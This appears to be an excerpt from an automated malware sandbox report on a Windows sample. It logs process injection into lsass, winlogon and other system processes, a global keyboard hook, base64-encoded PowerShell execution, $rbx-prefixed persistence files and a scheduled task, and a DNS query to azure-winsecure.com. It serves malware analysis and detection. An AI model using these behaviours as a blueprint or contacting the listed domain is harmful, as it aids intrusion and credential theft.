Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000002BCD7E3DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	20_2_000002BCD7E3DA18
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000002BCD7E3D894 FindFirstFileExW,	20_2_000002BCD7E3D894
Source: C:\Windows\System32\conhost.exe	Code function: 37_2_0000026504EADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	37_2_0000026504EADA18
Source: C:\Windows\System32\conhost.exe	Code function: 37_2_0000026504EAD894 FindFirstFileExW,	37_2_0000026504EAD894
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1ACD894 FindFirstFileExW,	38_2_0000025DC1ACD894
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1ACDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	38_2_0000025DC1ACDA18
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1CED894 FindFirstFileExW,	38_2_0000025DC1CED894
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1CEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	38_2_0000025DC1CEDA18
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC64DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	39_2_00000225DC64DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC64D894 FindFirstFileExW,	39_2_00000225DC64D894
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC67DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	39_2_00000225DC67DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC67D894 FindFirstFileExW,	39_2_00000225DC67D894
Source: C:\Windows\System32\lsass.exe	Code function: 40_2_00000202C0AEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	40_2_00000202C0AEDA18
Source: C:\Windows\System32\lsass.exe	Code function: 40_2_00000202C0AED894 FindFirstFileExW,	40_2_00000202C0AED894
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000002A66130DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	41_2_000002A66130DA18
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000002A66130D894 FindFirstFileExW,	41_2_000002A66130D894
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEDCDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	42_2_000002BAAEDCDA18
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEDCD894 FindFirstFileExW,	42_2_000002BAAEDCD894
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEE4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	42_2_000002BAAEE4DA18
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEE4D894 FindFirstFileExW,	42_2_000002BAAEE4D894
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A879CD894 FindFirstFileExW,	43_2_0000026A879CD894
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A879CDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	43_2_0000026A879CDA18
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A87F4D894 FindFirstFileExW,	43_2_0000026A87F4D894
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A87F4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	43_2_0000026A87F4DA18
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	44_2_00000179537ADA18
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537AD894 FindFirstFileExW,	44_2_00000179537AD894
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	44_2_00000179537DDA18
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537DD894 FindFirstFileExW,	44_2_00000179537DD894
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_2_0000016CE653DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	45_2_0000016CE653DA18
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_2_0000016CE653D894 FindFirstFileExW,	45_2_0000016CE653D894
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_000002295D56DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	46_2_000002295D56DA18
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_000002295D56D894 FindFirstFileExW,	46_2_000002295D56D894

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: azure-winsecure.com

Source: Microsoft-Windows-LiveId%4Operational.evtx.50.dr	String found in binary or memory: http://Passport.NET/tb
Source: lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: lsass.exe, 00000028.00000002.3011588916.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000028.00000002.3033356761.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: lsass.exe, 00000028.00000002.3011588916.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 00000028.00000002.3033356761.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: lsass.exe, 00000028.00000000.2455463583.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3019367929.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: lsass.exe, 00000028.00000002.3011588916.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000028.00000002.3033356761.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: lsass.exe, 00000028.00000002.3011588916.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000028.00000002.3019367929.00000202C0200000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2455463583.00000202C0200000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000028.00000000.2454743995.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3007290735.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: powershell.exe, 00000007.00000002.2316955445.000001FDC5ABD000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2652633968.000001C2D2BC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 00000028.00000002.3011588916.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 00000028.00000000.2455463583.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3019367929.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 00000028.00000002.3033356761.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0H
Source: lsass.exe, 00000028.00000002.3033356761.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2455463583.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3019367929.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 00000024.00000002.2457748410.000001C2C2BDD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2536368121.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3076105441.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: svchost.exe, 00000033.00000000.2527662672.00000241A96E0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2457748410.000001C2C29B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454743995.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3007290735.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: Amcache.hve.10.dr	String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000024.00000002.2457748410.000001C2C2BDD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2536368121.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3076105441.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 00000028.00000002.3033356761.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0~
Source: powershell.exe, 0000001A.00000002.3037904696.000002123B5A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co9=
Source: powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp, Null.26.dr, Null.7.dr	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2457748410.000001C2C29B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6xGx
Source: powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000024.00000002.2457748410.000001C2C2BDD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2536368121.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3076105441.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000024.00000002.2457748410.000001C2C3B35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000007.00000002.2316955445.000001FDC5ABD000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.50.dr	String found in binary or memory: https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Windows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 1284, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4828, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B8C0FF4 NtResumeThread,	36_2_00007FFD9B8C0FF4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B8C0F30 NtSetContextThread,	36_2_00007FFD9B8C0F30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B8C0C6D NtWriteVirtualMemory,	36_2_00007FFD9B8C0C6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B8BE0B8 NtUnmapViewOfSection,	36_2_00007FFD9B8BE0B8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B8C0A4E NtUnmapViewOfSection,	36_2_00007FFD9B8C0A4E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B8BE088 NtUnmapViewOfSection,	36_2_00007FFD9B8BE088
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,	38_2_0000000140001868
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC642C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,	39_2_00000225DC642C80
Source: C:\Windows\System32\lsass.exe	Code function: 40_2_00000202C0AE2300 NtQuerySystemInformation,StrCmpNIW,	40_2_00000202C0AE2300
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEE42C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,	42_2_000002BAAEE42C80
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_2_0000016CE6532300 NtQuerySystemInformation,StrCmpNIW,	45_2_0000016CE6532300

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\$rbx-onimai2	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\system32\20241004
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\system32\20241004\PowerShell_transcript.128757.tvTEgCNQ.20241004034311.txt
Source: C:\Windows\System32\wbem\WMIADAP.exe	File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h
Source: C:\Windows\System32\wbem\WMIADAP.exe	File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\System32\Tasks\$rbx-QgS1M4PT

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File deleted: C:\Windows\Temp\__PSScriptPolicyTest_4bxtuddq.5xi.ps1

Source: C:\Windows\System32\cmd.exe	Code function: 19_3_00000224138DCC94	19_3_00000224138DCC94
Source: C:\Windows\System32\cmd.exe	Code function: 19_3_00000224138D23F0	19_3_00000224138D23F0
Source: C:\Windows\System32\cmd.exe	Code function: 19_3_00000224138DCE18	19_3_00000224138DCE18
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241390D894	19_2_000002241390D894
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_0000022413902FF0	19_2_0000022413902FF0
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241390DA18	19_2_000002241390DA18
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241393D894	19_2_000002241393D894
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_0000022413932FF0	19_2_0000022413932FF0
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241393DA18	19_2_000002241393DA18
Source: C:\Windows\System32\conhost.exe	Code function: 20_3_000002BCD7E0CE18	20_3_000002BCD7E0CE18
Source: C:\Windows\System32\conhost.exe	Code function: 20_3_000002BCD7E0CC94	20_3_000002BCD7E0CC94
Source: C:\Windows\System32\conhost.exe	Code function: 20_3_000002BCD7E023F0	20_3_000002BCD7E023F0
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000002BCD7E3DA18	20_2_000002BCD7E3DA18
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000002BCD7E3D894	20_2_000002BCD7E3D894
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000002BCD7E32FF0	20_2_000002BCD7E32FF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B8BE3D2	36_2_00007FFD9B8BE3D2
Source: C:\Windows\System32\conhost.exe	Code function: 37_3_0000026504E7CE18	37_3_0000026504E7CE18
Source: C:\Windows\System32\conhost.exe	Code function: 37_3_0000026504E7CC94	37_3_0000026504E7CC94
Source: C:\Windows\System32\conhost.exe	Code function: 37_3_0000026504E723F0	37_3_0000026504E723F0
Source: C:\Windows\System32\conhost.exe	Code function: 37_2_0000026504EADA18	37_2_0000026504EADA18
Source: C:\Windows\System32\conhost.exe	Code function: 37_2_0000026504EAD894	37_2_0000026504EAD894
Source: C:\Windows\System32\conhost.exe	Code function: 37_2_0000026504EA2FF0	37_2_0000026504EA2FF0
Source: C:\Windows\System32\dllhost.exe	Code function: 38_3_0000025DC1A9CC94	38_3_0000025DC1A9CC94
Source: C:\Windows\System32\dllhost.exe	Code function: 38_3_0000025DC1A923F0	38_3_0000025DC1A923F0
Source: C:\Windows\System32\dllhost.exe	Code function: 38_3_0000025DC1A9CE18	38_3_0000025DC1A9CE18
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000000140001CF0	38_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000000140002D4C	38_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000000140003204	38_2_0000000140003204
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000000140002434	38_2_0000000140002434
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000000140001274	38_2_0000000140001274
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1ACD894	38_2_0000025DC1ACD894
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1AC2FF0	38_2_0000025DC1AC2FF0
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1ACDA18	38_2_0000025DC1ACDA18
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1CED894	38_2_0000025DC1CED894
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1CE2FF0	38_2_0000025DC1CE2FF0
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1CEDA18	38_2_0000025DC1CEDA18
Source: C:\Windows\System32\winlogon.exe	Code function: 39_3_00000225DC61CE18	39_3_00000225DC61CE18
Source: C:\Windows\System32\winlogon.exe	Code function: 39_3_00000225DC6123F0	39_3_00000225DC6123F0
